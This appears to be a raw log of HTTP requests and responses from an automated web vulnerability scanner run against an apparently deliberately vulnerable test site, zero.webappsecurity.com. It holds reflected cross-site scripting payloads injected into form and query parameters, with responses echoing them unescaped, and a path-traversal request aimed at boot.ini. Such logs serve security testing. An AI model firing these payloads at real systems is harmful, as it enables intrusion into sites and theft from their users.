User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /login/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:17 GMT
X-Powered-By: ASP.NET
Location: login.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /linking/link1/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:27 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /debug.dat HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:22 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:21 GMT
ETag: "da1665c2a8dc11:8f6"
Content-Length: 25
BRUTE FORCE CHECK SUCCESSGET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=--><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /plink.asp?a=b&c=</textarea><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 205
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = </textarea><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=>"'><img%20src="javascript:alert('XSS')">HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 115
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data >"'><img src="javascript:alert('XSS')"><br>Please try again.
</body>
</html>
GET /cgi-bin/ikonboard/help.cgi?helpon=../../../../../boot.ini%00 HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:19 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT
ETag: "ac14c2f8a9dc11:8f6"
Content-Length: 18
bleh exploit :0:0:GET /testing/plink.asp HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:51 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 349
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font>
<p>
<font face="Arial" size=2>Include file not found</font>
<p>
<font face="Arial" size=2>/testing/plink.asp</font><font face="Arial" size=2>, line 29</font>
<p>
<font face="Arial" size=2>The include file 'footer.inc' was not found.
</font> GET /_private/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:41 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:24 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:11 GMT
ETag: "f08183fea9dc11:8f6"
Content-Length: 39
<A HREF="./link12/index.htm">Link12</A>GET /cgi-bin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:47 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /forgot2.asp?msg2=no&msg=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:03 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1853
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">>"'><img src="javascript:alert('XSS')"></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=>"><script>alert("XSS")</script>&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /linking/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:27 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=</textarea><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
